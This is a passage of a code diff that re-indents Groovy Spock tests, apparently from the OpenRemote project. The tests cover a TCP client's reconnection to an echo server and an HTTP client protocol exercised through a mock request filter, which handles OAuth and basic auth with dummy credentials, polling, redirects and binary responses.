+    then: "we should get the same message back"
+    conditions.eventually {
+      assert lastMessage == "Yes there is!"
+    }
+
+    when: "we lose connection to the server"
+    connectionStatuses.clear()
+    client.connectAttempts = 0
+    echoServer.stop()
+
+    then: "the server status should be DISCONNECTED"
+    conditions.eventually {
+      assert echoServer.connectionStatus == ConnectionStatus.DISCONNECTED
+    }
+
+    then: "the client status should change to CONNECTING and several re-connection attempts should be made"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.CONNECTING
+      assert connectionStatuses.contains(ConnectionStatus.CONNECTING)
+      assert client.connectAttempts> 2
+    }
+
+    when: "the connection to the server is restored"
+    // need to retry here as the previous connected socket might not have been released
+    def retries = 0
+    while (echoServer.connectionStatus != ConnectionStatus.CONNECTED && retries < 10) {
+      echoServer.start()
+      Thread.sleep(500)
+      retries++
+    }
+
+    then: "the server is connected"
+    assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatuses.last() == ConnectionStatus.CONNECTED
+      assert echoServer.allChannels.size() == 1
+    }
+
+    when: "the server sends a message"
+    echoServer.sendMessage("Is there anyone there?")
+
+    then: "we should receive the message"
+    conditions.eventually {
+      assert lastMessage == "Is there anyone there?"
+    }
+
+    when: "we send a message to the server"
+    client.sendMessage("Yes there is!;")
+
+    then: "we should get the same message back"
+    conditions.eventually {
+      assert lastMessage == "Yes there is!"
+    }
+
+    when: "we request the processor to disconnect"
+    client.disconnect()
+
+    then: "the client should become DISCONNECTED"
+    conditions.eventually {
+      //            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
+      assert connectionStatuses.last() == ConnectionStatus.DISCONNECTED
+    }
+
+    cleanup: "the server should be stopped"
+    client.disconnect()
+    echoServer.stop()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/http/HttpClientProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/http/HttpClientProtocolTest.groovy
@@ -63,628 +63,628 @@ import static org.openremote.model.value.ValueType.*
 
 class HttpClientProtocolTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    def mockServer = new ClientRequestFilter() {
+  @Shared
+  def mockServer = new ClientRequestFilter() {
 
-        private boolean supportsRefresh
-        private int accessTokenCount
-        private int refreshTokenCount
-        private String accessToken = null
-        private String refreshToken = null
-        private int pollCountFast = 0
-        private int pollCountSlow = 0
-        private boolean putRequestWithHeadersCalled = false
-        private int successCount = 0
-        private int failureCount = 0
-        private String dynamicPathParam = ""
+    private boolean supportsRefresh
+    private int accessTokenCount
+    private int refreshTokenCount
+    private String accessToken = null
+    private String refreshToken = null
+    private int pollCountFast = 0
+    private int pollCountSlow = 0
+    private boolean putRequestWithHeadersCalled = false
+    private int successCount = 0
+    private int failureCount = 0
+    private String dynamicPathParam = ""
 
-        @Override
-        void filter(ClientRequestContext requestContext) throws IOException {
-            def requestUri = requestContext.uri
-            def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
-            getLOG().info("MOCK SERVER: $requestPath")
+    @Override
+    void filter(ClientRequestContext requestContext) throws IOException {
+      def requestUri = requestContext.uri
+      def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
+      getLOG().info("MOCK SERVER: $requestPath")
 
-            switch (requestPath) {
-                case "https://mockapi/basicauth":
-                    def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
-                    if (authHeader != null) {
-                        def usernameAndPassword = BasicAuthHelper.parseHeader(authHeader)
-                        if (usernameAndPassword != null
-                            && usernameAndPassword[0] == "testuser"
-                            && usernameAndPassword[1] == "password1") {
-                            requestContext.abortWith(Response.ok().build())
-                            return
-                        }
-                    }
-                    break
-                case "https://mockapi/token":
-                    // OAuth token request extract the grant info
-                    def grant = ((Form) requestContext.getEntity()).asMap()
-                    if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "password"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "TestClient"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "TestSecret"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
-                        && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_USERNAME) == "testuser"
-                        && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_PASSWORD) == "password") {
-                        accessToken = "accesstoken" + accessTokenCount++
-                        def response = new OAuthServerResponse()
-                        response.accessToken = accessToken
-                        response.expiresIn = 100
-                        response.tokenType = "Bearer"
+      switch (requestPath) {
+        case "https://mockapi/basicauth":
+          def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
+          if (authHeader != null) {
+            def usernameAndPassword = BasicAuthHelper.parseHeader(authHeader)
+            if (usernameAndPassword != null
+                    && usernameAndPassword[0] == "testuser"
+                    && usernameAndPassword[1] == "password1") {
+              requestContext.abortWith(Response.ok().build())
+              return
+            }
+          }
+          break
+        case "https://mockapi/token":
+        // OAuth token request extract the grant info
+          def grant = ((Form) requestContext.getEntity()).asMap()
+          if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "password"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "TestClient"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "TestSecret"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
+                  && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_USERNAME) == "testuser"
+                  && grant.getFirst(OAuthPasswordGrant.VALUE_KEY_PASSWORD) == "password") {
+            accessToken = "accesstoken" + accessTokenCount++
+            def response = new OAuthServerResponse()
+            response.accessToken = accessToken
+            response.expiresIn = 100
+            response.tokenType = "Bearer"
 
-                        // Include refresh token if configured to support it
-                        if (supportsRefresh) {
-                            refreshToken = "refreshtoken" + accessTokenCount
-                            response.refreshToken = refreshToken
-                        }
-
-                        requestContext.abortWith(
-                            Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
-                        )
-                        return
-                    } else if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "refresh_token"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "TestClient"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "TestSecret"
-                        && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
-                        && grant.getFirst(OAuthRefreshTokenGrant.REFRESH_TOKEN_GRANT_TYPE) == refreshToken) {
-                        refreshTokenCount++
-                        accessToken = "accesstoken" + accessTokenCount++
-                        refreshToken = "refreshtoken" + accessTokenCount
-                        def response = new OAuthServerResponse()
-                        response.accessToken = accessToken
-                        response.refreshToken = refreshToken
-                        response.expiresIn = 100
-                        response.tokenType = "Bearer"
-
-                        requestContext.abortWith(
-                            Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
-                        )
-                        return
-                    }
-                    break
-                default:
-                    // Check access token is valid
-                    def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
-                    def accessToken = authHeader == null ? null : authHeader.substring(7)
-                    if (accessToken == null || this.accessToken == null || accessToken != this.accessToken) {
-                        requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
-                        return
-                    }
-                    break
+            // Include refresh token if configured to support it
+            if (supportsRefresh) {
+              refreshToken = "refreshtoken" + accessTokenCount
+              response.refreshToken = refreshToken
             }
 
-            switch (requestPath) {
-                case "https://mockapi/put_request_with_headers":
-                    UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
-                    def queryParams = uriInfo.getQueryParameters(true)
-                    if (queryParams.get("param1").size() == 1
-                        && queryParams.getFirst("param1") == "param1Value1"
-                        && queryParams.get("param2").size() == 3
-                        && queryParams.get("param2").contains("param2Value1")
-                        && queryParams.get("param2").contains("param2Value2")
-                        && queryParams.get("param2").contains("param2Value3")
-                        && queryParams.get("param3").size() == 1
-                        && queryParams.getFirst("param3") == "param3Value1"
-                        && requestContext.method == HttpMethod.PUT
-                        && requestContext.getHeaderString("header1") == "header1Value1"
-                        && requestContext.getHeaderString("header2") == "header2Value1,header2Value2"
-                        && requestContext.getHeaderString("header3") == "header3Value1,header3Value2"
-                        && requestContext.getHeaderString("Content-type") == MediaType.APPLICATION_JSON) {
-
-                        String bodyStr = (String)requestContext.getEntity()
-                        Map body = (Map)ValueUtil.parse(bodyStr).orElse(null)
-                        if (body.containsKey("prop1")
-                            && ((Map)body.get("prop1")).get("myProp1") == 123
-                            && ((Map)body.get("prop1")).get("myProp2")
-                            && body.containsKey("prop2") && body.get("prop2") == "prop2Value") {
-                            putRequestWithHeadersCalled = true
-                            requestContext.abortWith(Response.ok().build())
-                            return
-                        }
-                    }
-                    break
-                case "https://mockapi/value/on/set":
-                    dynamicPathParam = "on"
-                    requestContext.abortWith(Response.ok().build())
-                    return
-                case "https://mockapi/value/off/set":
-                    dynamicPathParam = "off"
-                    requestContext.abortWith(Response.ok().build())
-                    return
-                case "https://mockapi/get_poll_slow":
-                    pollCountSlow++
-                    requestContext.abortWith(
-                        Response
-                            .ok("This is an example response where the value of 100% is in the body of the message.", MediaType.TEXT_PLAIN)
-                            .build()
+            requestContext.abortWith(
+                    Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
                     )
-                    return
-                case "https://mockapi/get_poll_fast":
-                    pollCountFast++
-                    requestContext.abortWith(
-                        Response
-                            .ok("This is an example response where there are multiple values of 100% 60% in the body of the message.", MediaType.TEXT_PLAIN)
-                            .build()
+            return
+          } else if (grant.getFirst(OAuthGrant.VALUE_KEY_GRANT_TYPE) == "refresh_token"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_ID) == "TestClient"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_CLIENT_SECRET) == "TestSecret"
+                  && grant.getFirst(OAuthGrant.VALUE_KEY_SCOPE) == "scope1 scope2"
+                  && grant.getFirst(OAuthRefreshTokenGrant.REFRESH_TOKEN_GRANT_TYPE) == refreshToken) {
+            refreshTokenCount++
+            accessToken = "accesstoken" + accessTokenCount++
+            refreshToken = "refreshtoken" + accessTokenCount
+            def response = new OAuthServerResponse()
+            response.accessToken = accessToken
+            response.refreshToken = refreshToken
+            response.expiresIn = 100
+            response.tokenType = "Bearer"
+
+            requestContext.abortWith(
+                    Response.ok(response, MediaType.APPLICATION_JSON_TYPE).build()
                     )
-                    return
-                case "https://mockapi/get_success_200":
-                case "https://redirected.mockapi/get_success_200":
-                    successCount++
-                    requestContext.abortWith(Response.ok().build())
-                    return
-                case "https://mockapi/get_failure_401":
-                    failureCount++
-                    requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
-                    return
+            return
+          }
+          break
+        default:
+        // Check access token is valid
+          def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
+          def accessToken = authHeader == null ? null : authHeader.substring(7)
+          if (accessToken == null || this.accessToken == null || accessToken != this.accessToken) {
+            requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
+            return
+          }
+          break
+      }
 
-                case "https://mockapi/redirect":
-                    requestContext.abortWith(Response.temporaryRedirect(new URI("https://redirected.mockapi/get_success_200")).build())
-                    return
-                case "https://mockapi/binary":
-                    requestContext.abortWith(
-                            Response.ok(
-                                    new byte[] {(byte)0x1F & 0xFF, (byte)0x56 & 0xFF, (byte)0x01 & 0xFF, (byte)0xAE & 0xFF, (byte)0x12 & 0xFF}, MediaType.APPLICATION_OCTET_STREAM_TYPE
-                            ).build()
-                    )
-                    return
-                case "https://mockapi/dynamic_time_1":
-                    pollCountFast++
-                    def uriInfo = new ResteasyUriInfo(requestContext.uri)
-                    def queryParams = uriInfo.getQueryParameters(true)
-                    def yearMonthDay = doDynamicTimeReplace('%TIME:yyyy-MM-dd%', getInstantTimeOf(container))
-                    def epochMillis = getInstantTimeOf(container).plus(1, ChronoUnit.HOURS).toEpochMilli()
-                    def epochSeconds = getInstantTimeOf(container).minus(50, ChronoUnit.DAYS).getEpochSecond()
-                    def localDateTime = getInstantTimeOf(container).atZone(ZoneId.systemDefault()).toLocalDateTime()
+      switch (requestPath) {
+        case "https://mockapi/put_request_with_headers":
+          UriInfo uriInfo = new ResteasyUriInfo(requestContext.uri)
+          def queryParams = uriInfo.getQueryParameters(true)
+          if (queryParams.get("param1").size() == 1
+                  && queryParams.getFirst("param1") == "param1Value1"
+                  && queryParams.get("param2").size() == 3
+                  && queryParams.get("param2").contains("param2Value1")
+                  && queryParams.get("param2").contains("param2Value2")
+                  && queryParams.get("param2").contains("param2Value3")
+                  && queryParams.get("param3").size() == 1
+                  && queryParams.getFirst("param3") == "param3Value1"
+                  && requestContext.method == HttpMethod.PUT
+                  && requestContext.getHeaderString("header1") == "header1Value1"
+                  && requestContext.getHeaderString("header2") == "header2Value1,header2Value2"
+                  && requestContext.getHeaderString("header3") == "header3Value1,header3Value2"
+                  && requestContext.getHeaderString("Content-type") == MediaType.APPLICATION_JSON) {
 
-                    if (yearMonthDay.substring(4,5) != '-'
-                        || yearMonthDay.substring(7,8) != '-'
-                        || yearMonthDay.substring(0,4) != Integer.toString(localDateTime.get(ChronoField.YEAR))
-                        || !yearMonthDay.substring(5,7).contains(Integer.toString(localDateTime.get(ChronoField.MONTH_OF_YEAR)))
-                        || !yearMonthDay.substring(8,10).contains(Integer.toString(localDateTime.get(ChronoField.DAY_OF_MONTH)))
-                    ) {
-                        requestContext.abortWith(Response.status(Response.Status.BAD_REQUEST).build())
-                        return
-                    }
-
-                    if (queryParams.get("param1").size() == 1
-                            && queryParams.getFirst("param1") == yearMonthDay
-                            && Long.parseLong(requestContext.getHeaderString("header1")) == epochMillis
-                            && Long.parseLong(requestContext.getHeaderString("header2")) == epochSeconds
-                            && requestContext.getHeaderString("header3") == DateTimeFormatter.ISO_INSTANT.format(getInstantTimeOf(container))) {
-
-                        String bodyStr = (String) requestContext.getEntity()
-                        Map body = (Map) ValueUtil.parse(bodyStr).orElse(null)
-                        if (body.containsKey("prop1")
-                                && body.get("prop1") == doDynamicTimeReplace("%TIME+PT1H:yyyy-MM-dd HH:mm%", getInstantTimeOf(container))) {
-                            requestContext.abortWith(
-                                    Response
-                                            .ok(requestContext.getEntity() as String, MediaType.APPLICATION_JSON_TYPE)
-                                            .build()
-                            )
-                            return
-                        }
-                    }
+            String bodyStr = (String)requestContext.getEntity()
+            Map body = (Map)ValueUtil.parse(bodyStr).orElse(null)
+            if (body.containsKey("prop1")
+                    && ((Map)body.get("prop1")).get("myProp1") == 123
+                    && ((Map)body.get("prop1")).get("myProp2")
+                    && body.containsKey("prop2") && body.get("prop2") == "prop2Value") {
+              putRequestWithHeadersCalled = true
+              requestContext.abortWith(Response.ok().build())
+              return
             }
+          }
+          break
+        case "https://mockapi/value/on/set":
+          dynamicPathParam = "on"
+          requestContext.abortWith(Response.ok().build())
+          return
+        case "https://mockapi/value/off/set":
+          dynamicPathParam = "off"
+          requestContext.abortWith(Response.ok().build())
+          return
+        case "https://mockapi/get_poll_slow":
+          pollCountSlow++
+          requestContext.abortWith(
+                  Response
+                  .ok("This is an example response where the value of 100% is in the body of the message.", MediaType.TEXT_PLAIN)
+                  .build()
+                  )
+          return
+        case "https://mockapi/get_poll_fast":
+          pollCountFast++
+          requestContext.abortWith(
+                  Response
+                  .ok("This is an example response where there are multiple values of 100% 60% in the body of the message.", MediaType.TEXT_PLAIN)
+                  .build()
+                  )
+          return
+        case "https://mockapi/get_success_200":
+        case "https://redirected.mockapi/get_success_200":
+          successCount++
+          requestContext.abortWith(Response.ok().build())
+          return
+        case "https://mockapi/get_failure_401":
+          failureCount++
+          requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
+          return
 
-            requestContext.abortWith(Response.serverError().build())
-        }
+        case "https://mockapi/redirect":
+          requestContext.abortWith(Response.temporaryRedirect(new URI("https://redirected.mockapi/get_success_200")).build())
+          return
+        case "https://mockapi/binary":
+          requestContext.abortWith(
+          Response.ok(
+                  new byte[] {
+                    (byte)0x1F & 0xFF, (byte)0x56 & 0xFF, (byte)0x01 & 0xFF, (byte)0xAE & 0xFF, (byte)0x12 & 0xFF
+                  }, MediaType.APPLICATION_OCTET_STREAM_TYPE
+                  ).build()
+          )
+          return
+        case "https://mockapi/dynamic_time_1":
+          pollCountFast++
+          def uriInfo = new ResteasyUriInfo(requestContext.uri)
+          def queryParams = uriInfo.getQueryParameters(true)
+          def yearMonthDay = doDynamicTimeReplace('%TIME:yyyy-MM-dd%', getInstantTimeOf(container))
+          def epochMillis = getInstantTimeOf(container).plus(1, ChronoUnit.HOURS).toEpochMilli()
+          def epochSeconds = getInstantTimeOf(container).minus(50, ChronoUnit.DAYS).getEpochSecond()
+          def localDateTime = getInstantTimeOf(container).atZone(ZoneId.systemDefault()).toLocalDateTime()
+
+          if (yearMonthDay.substring(4,5) != '-'
+                  || yearMonthDay.substring(7,8) != '-'
+                  || yearMonthDay.substring(0,4) != Integer.toString(localDateTime.get(ChronoField.YEAR))
+                  || !yearMonthDay.substring(5,7).contains(Integer.toString(localDateTime.get(ChronoField.MONTH_OF_YEAR)))
+                  || !yearMonthDay.substring(8,10).contains(Integer.toString(localDateTime.get(ChronoField.DAY_OF_MONTH)))
+          ) {
+            requestContext.abortWith(Response.status(Response.Status.BAD_REQUEST).build())
+            return
+          }
+
+          if (queryParams.get("param1").size() == 1
+                  && queryParams.getFirst("param1") == yearMonthDay
+                  && Long.parseLong(requestContext.getHeaderString("header1")) == epochMillis
+                  && Long.parseLong(requestContext.getHeaderString("header2")) == epochSeconds
+                  && requestContext.getHeaderString("header3") == DateTimeFormatter.ISO_INSTANT.format(getInstantTimeOf(container))) {
+
+            String bodyStr = (String) requestContext.getEntity()
+            Map body = (Map) ValueUtil.parse(bodyStr).orElse(null)
+            if (body.containsKey("prop1")
+                    && body.get("prop1") == doDynamicTimeReplace("%TIME+PT1H:yyyy-MM-dd HH:mm%", getInstantTimeOf(container))) {
+              requestContext.abortWith(
+                      Response
+                      .ok(requestContext.getEntity() as String, MediaType.APPLICATION_JSON_TYPE)
+                      .build()
+                      )
+              return
+            }
+          }
+      }
+
+      requestContext.abortWith(Response.serverError().build())
     }
+  }
 
-    def cleanup() {
-        mockServer.supportsRefresh = false
-        mockServer.accessToken = null
-        mockServer.refreshToken = null
-        mockServer.accessTokenCount = 0
-        mockServer.refreshTokenCount = 0
-        mockServer.pollCountSlow = 0
-        mockServer.pollCountFast = 0
-        mockServer.successCount = 0
-        mockServer.failureCount = 0
-        mockServer.putRequestWithHeadersCalled = false
-    }
+  def cleanup() {
+    mockServer.supportsRefresh = false
+    mockServer.accessToken = null
+    mockServer.refreshToken = null
+    mockServer.accessTokenCount = 0
+    mockServer.refreshTokenCount = 0
+    mockServer.pollCountSlow = 0
+    mockServer.pollCountFast = 0
+    mockServer.successCount = 0
+    mockServer.failureCount = 0
+    mockServer.putRequestWithHeadersCalled = false
+  }
 
-    def "Check HTTP client protocol and linked attribute deployment"() {
+  def "Check HTTP client protocol and linked attribute deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 1)
 
-        and: "the HTTP client protocol min times are adjusted for testing"
-        HTTPProtocol.MIN_POLLING_MILLIS = 10
+    and: "the HTTP client protocol min times are adjusted for testing"
+    HTTPProtocol.MIN_POLLING_MILLIS = 10
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
 
-        when: "a HTTP client agent is created"
-        HTTPAgent agent = new HTTPAgent("Test agent")
+    when: "a HTTP client agent is created"
+    HTTPAgent agent = new HTTPAgent("Test agent")
             .setRealm(Constants.MASTER_REALM)
             .setBaseURI("https://mockapi")
             .setOAuthGrant(
-                new OAuthPasswordGrant("https://mockapi/token",
-                    "TestClient",
-                    "TestSecret",
-                    "scope1 scope2",
-                    "testuser",
-                    "password")
+            new OAuthPasswordGrant("https://mockapi/token",
+            "TestClient",
+            "TestSecret",
+            "scope1 scope2",
+            "testuser",
+            "password")
             )
-        .setFollowRedirects(true)
-        .setRequestHeaders(
+            .setFollowRedirects(true)
+            .setRequestHeaders(
             ValueUtil.parse(/{"header1": ["header1Value1"], "header2": ["header2Value1","header2Value2"]}/, MultivaluedStringMap.class).orElseThrow()
-        )
-        .setRequestQueryParameters(
+            )
+            .setRequestQueryParameters(
             ValueUtil.parse(/{"param1": ["param1Value1"], "param2": ["param2Value1","param2Value2"]}/, MultivaluedStringMap.class).orElseThrow()
-        )
+            )
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should authenticate and the connection status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, HTTPAgent.class)
-            assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
-        }
+    then: "the protocol should authenticate and the connection status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, HTTPAgent.class)
+      assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
+    }
 
-        when: "the mock filter is registered on the protocol instance client to mock auth and requests"
-        def protocolInstance = agentService.getProtocolInstance(agent.id) as HTTPProtocol
-        protocolInstance.client.register(mockServer, Integer.MAX_VALUE)
-        protocolInstance.doStart(getContainer())
+    when: "the mock filter is registered on the protocol instance client to mock auth and requests"
+    def protocolInstance = agentService.getProtocolInstance(agent.id) as HTTPProtocol
+    protocolInstance.client.register(mockServer, Integer.MAX_VALUE)
+    protocolInstance.doStart(getContainer())
 
-        and: "an asset is created with attributes linked to the agent"
-        def asset = new ThingAsset("Test Asset")
+    and: "an asset is created with attributes linked to the agent"
+    def asset = new ThingAsset("Test Asset")
             .setParent(agent)
             .addOrReplaceAttributes(
-                // attribute that sends requests to the server using PUT with dynamic body and custom header to override parent
-                new Attribute<>("putRequestWithHeaders")
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath("put_request_with_headers")
-                            .setMethod(HTTPMethod.PUT)
-                            .setWriteValue('{"prop1": %VALUE%, "prop2": "prop2Value"}')
-                            .setContentType(MediaType.APPLICATION_JSON)
-                            .setHeaders(new MultivaluedStringMap(
-                                [
-                                    ("header3") : ["header3Value1","header3Value2"]
-                                ]
+            // attribute that sends requests to the server using PUT with dynamic body and custom header to override parent
+            new Attribute<>("putRequestWithHeaders")
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("put_request_with_headers")
+                    .setMethod(HTTPMethod.PUT)
+                    .setWriteValue('{"prop1": %VALUE%, "prop2": "prop2Value"}')
+                    .setContentType(MediaType.APPLICATION_JSON)
+                    .setHeaders(new MultivaluedStringMap(
+                            [
+                              ("header3") : ["header3Value1", "header3Value2"]
+                            ]
                             ))
-                            .setQueryParameters(new MultivaluedStringMap(
-                                [
-                                    ("param2") : ["param2Value3"],
-                                    ("param3") : ["param3Value1"]
-                                ]
+                    .setQueryParameters(new MultivaluedStringMap(
+                            [
+                              ("param2") : ["param2Value3"],
+                              ("param3") : ["param3Value1"]
+                            ]
                             ))
-                        )
-                    ),
-                // attribute that sends requests to the server using GET with dynamic path
-                new Attribute<>("getRequestWithDynamicPath", BOOLEAN)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath('value/%VALUE%/set')
-                            .setWriteValueConverter((Map)ValueUtil.parse("{\n" +
-                                "    \"TRUE\": \"on\",\n" +
-                                "    \"FALSE\": \"off\"\n" +
-                                "}").get())
-                        )
-                    ),
-                // attribute that polls the server using GET and uses regex filter on response
-                new Attribute<>("getPollSlow", INTEGER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath("get_poll_slow")
-                        .setPollingMillis(200)
-                            .setValueFilters(
-                                [
-                                    new RegexValueFilter(Pattern.compile("\\d+"))
-                                ] as ValueFilter[]
-                            )
-                        )
-                    ),
-                // attribute that polls the server using GET and uses regex filter on response
-                new Attribute<>("getPollFast", INTEGER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath("get_poll_fast")
-                            .setPollingMillis(100)
-                            .setValueFilters(
-                                [
-                                    new RegexValueFilter(Pattern.compile("\\d+")).setMatchIndex(1)
-                                ] as ValueFilter[]
-                            )
-                        )
-                    ),
-                // attribute that expects binary data using GET and uses sub string on response
-                new Attribute<>("getBinary", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath("binary")
-                            .setPollingMillis(100)
-                            .setMessageConvertBinary(true)
-                            .setValueFilters(
-                                [
-                                    new SubStringValueFilter(22, 24)
-                                ] as ValueFilter[]
-                            )
-                            .setValueConverter(Map.of(
-                                    "00", "OFF",
-                                    "01", "ON")
-                            )
-                        )
-                    ),
-                // attribute that expects HEX data using GET and uses sub string on response
-                new Attribute<>("getHex", TEXT)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
-                            .setPath("binary")
-                            .setPollingMillis(100)
-                            .setMessageConvertHex(true)
-                            .setValueFilters(
-                                [
-                                    new SubStringValueFilter(4, 6)
-                                ] as ValueFilter[]
-                            )
-                            .setValueConverter(Map.of(
-                                    "00", "OFF",
-                                    "01", "ON")
-                            )
-                        )
                     )
-        )
+                    ),
+            // attribute that sends requests to the server using GET with dynamic path
+            new Attribute<>("getRequestWithDynamicPath", BOOLEAN)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath('value/%VALUE%/set')
+                    .setWriteValueConverter((Map)ValueUtil.parse("{\n" +
+                    "    \"TRUE\": \"on\",\n" +
+                    "    \"FALSE\": \"off\"\n" +
+                    "}").get())
+                    )
+                    ),
+            // attribute that polls the server using GET and uses regex filter on response
+            new Attribute<>("getPollSlow", INTEGER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("get_poll_slow")
+                    .setPollingMillis(200)
+                    .setValueFilters(
+                            [
+                              new RegexValueFilter(Pattern.compile("\\d+"))
+                            ] as ValueFilter[]
+                            )
+                    )
+                    ),
+            // attribute that polls the server using GET and uses regex filter on response
+            new Attribute<>("getPollFast", INTEGER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("get_poll_fast")
+                    .setPollingMillis(100)
+                    .setValueFilters(
+                            [
+                              new RegexValueFilter(Pattern.compile("\\d+")).setMatchIndex(1)
+                            ] as ValueFilter[]
+                            )
+                    )
+                    ),
+            // attribute that expects binary data using GET and uses sub string on response
+            new Attribute<>("getBinary", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("binary")
+                    .setPollingMillis(100)
+                    .setMessageConvertBinary(true)
+                    .setValueFilters(
+                            [new SubStringValueFilter(22, 24)] as ValueFilter[]
+                            )
+                    .setValueConverter(Map.of(
+                            "00", "OFF",
+                            "01", "ON")
+                    )
+                    )
+                    ),
+            // attribute that expects HEX data using GET and uses sub string on response
+            new Attribute<>("getHex", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agent.id)
+                    .setPath("binary")
+                    .setPollingMillis(100)
+                    .setMessageConvertHex(true)
+                    .setValueFilters(
+                            [new SubStringValueFilter(4, 6)] as ValueFilter[]
+                            )
+                    .setValueConverter(Map.of(
+                            "00", "OFF",
+                            "01", "ON")
+                    )
+                    )
+                    )
+            )
 
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        then: "new request maps should be created in the HTTP client protocol for the linked attributes"
-        conditions.eventually {
-            assert ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).requestMap.size() == 6
-        }
+    then: "new request maps should be created in the HTTP client protocol for the linked attributes"
+    conditions.eventually {
+      assert ((HTTPProtocol)agentService.getProtocolInstance(agent.id)).requestMap.size() == 6
+    }
 
-        and: "the polling attributes should be polling the server"
-        conditions.eventually {
-            assert mockServer.pollCountSlow > 0
-            assert mockServer.pollCountFast > 0
-            assert mockServer.pollCountFast > mockServer.pollCountSlow
-        }
+    and: "the polling attributes should be polling the server"
+    conditions.eventually {
+      assert mockServer.pollCountSlow> 0
+      assert mockServer.pollCountFast> 0
+      assert mockServer.pollCountFast> mockServer.pollCountSlow
+    }
 
-        and: "the polling attributes should have the correct values"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("getPollSlow").flatMap({it.value}).orElse(null) == 100
-            assert asset.getAttribute("getPollFast").flatMap({it.value}).orElse(null) == 60
-            assert asset.getAttribute("getBinary").flatMap({it.value}).orElse(null) == "ON"
-            assert asset.getAttribute("getHex").flatMap({it.value}).orElse(null) == "ON"
-        }
